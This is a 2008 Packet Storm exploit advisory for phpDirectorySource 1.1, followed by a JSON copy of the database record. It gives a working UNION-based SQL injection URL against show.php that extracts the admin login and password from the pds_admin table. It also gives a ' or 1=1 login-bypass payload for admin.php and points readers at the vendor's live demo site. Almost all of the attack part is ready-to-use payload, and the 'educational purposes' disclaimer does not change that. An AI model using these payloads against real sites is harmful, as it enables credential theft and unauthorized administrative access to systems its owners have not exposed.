ID PACKETSTORM:65984
Type packetstorm
Reporter InjEctOrS
Modified 2008-05-05T00:00:00
Description
`|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title :: SQL Injection and Bypass Administrator Login
Author :: InjEctOr [s0f (at) w.cn]
&& FishEr762 [sq7 (at) w.cn]
Application :: phpDirectorySource 1.1
Download :: http://www.phpdirectorysource.com/files/pds_ver1_1.zip
Dork 1 :: use your mind :p
Greets :: Allah , TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
Expl0!te ::
http://127.0.0.1/[script]/show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*
i.e.
http://directory.xxx.com/show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/*
note:
used "and 1=0" koz lid is varchar so it's better way to make next query run
--------------
Bypass Administrator Login :
/directory/admin.php
username field
' or 1=1 /*
i.e. in demo site (demos always get the 1st shot lol)
http://www.phpdirectorysource.com/directory/admin.php
-------------------------------------------[End of context]----------------------------------------
`
{"type": "packetstorm", "published": "2008-05-05T00:00:00", "reporter": "InjEctOrS", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "ba122630cd54fb0c780627fb94b4e39a"}, {"key": "modified", "hash": "42d15c16876fd367146ebcabfc918032"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "42d15c16876fd367146ebcabfc918032"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "683b2a7342948fefcc95505ac3afb9e7"}, {"key": "sourceData", "hash": "e4817368509a6444e3134df67a771793"}, {"key": "sourceHref", "hash": "4781af92a7d1f0d12651337af6279275"}, {"key": "title", "hash": "790421f5376970329218a4160f3f45b2"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| \n| _ __ __ __ ______ | \n| /' \\ __ /'__`\\ /\\ \\__ /'__`\\ /\\ ___\\ | \n| /\\_, \\ ___ /\\_\\/\\_\\L\\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ __\\ \\ \\__/ | \n| \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ \\___``\\ | \n| \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\L\\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ \\/\\ \\L\\ \\ | \n| \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ \\ \\____/ | \n| \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ \\/___/ | \n| \\ \\____/ >> Kings of injection | \n| \\/___/ | \n| | \n|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=| \n \nTitle :: SQL Injection and Bypass Administrator Login \n \n \nAuthor :: InjEctOr [s0f (at) w.cn] \n \n&& FishEr762 [sq7 (at) w.cn] \n \n \nApplication :: phpDirectorySource 1.1 \n \nDownload :: http://www.phpdirectorysource.com/files/pds_ver1_1.zip \n \nDork 1 :: use your mind :p \n \n \nGreets :: Allah , TrYaG TeaM & Muslims Hackers \n \nTerms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts. \n \n \n \n--------------------------------------------[C o n t e x t]----------------------------------------- \n \n \nExpl0!te :: \n \nhttp://127.0.0.1/[script]/show.php?lid=1'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/* \n \n \ni.e. \nhttp://directory.xxx.com/show.php?lid=104'+and+1=0+UNION+SELECT+1,2,3,4,login,pass,7,8,9,10,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+FROM+pds_admin/* \n \nnote: \nused \"and 1=0\" koz lid is varchar so it's better way to make next query run \n \n-------------- \n \nBypass Administrator Login : \n/directory/admin.php \n \nusername field \n' or 1=1 /* \n \ni.e. in demo site (demos always get the 1st shot lol) \nhttp://www.phpdirectorysource.com/directory/admin.php \n \n \n-------------------------------------------[End of context]---------------------------------------- \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:23:42", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/65984/phpdirsource-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/65984/phpdirsource-sql.txt", "title": "phpdirsource-sql.txt", "enchantments": {"score": {"value": -0.6, "vector": "NONE", "modified": "2016-11-03T10:23:42"}, "dependencies": {"references": [], "modified": "2016-11-03T10:23:42"}, "vulnersScore": -0.6}, "references": [], "id": "PACKETSTORM:65984", "hash": "0bfb32a8eac3b70dc6ec8cba58d38127e6e205b5a5fb52388834ba3b7fc04d0b", "edition": 1, "cvelist": [], "modified": "2008-05-05T00:00:00", "description": ""}
{}
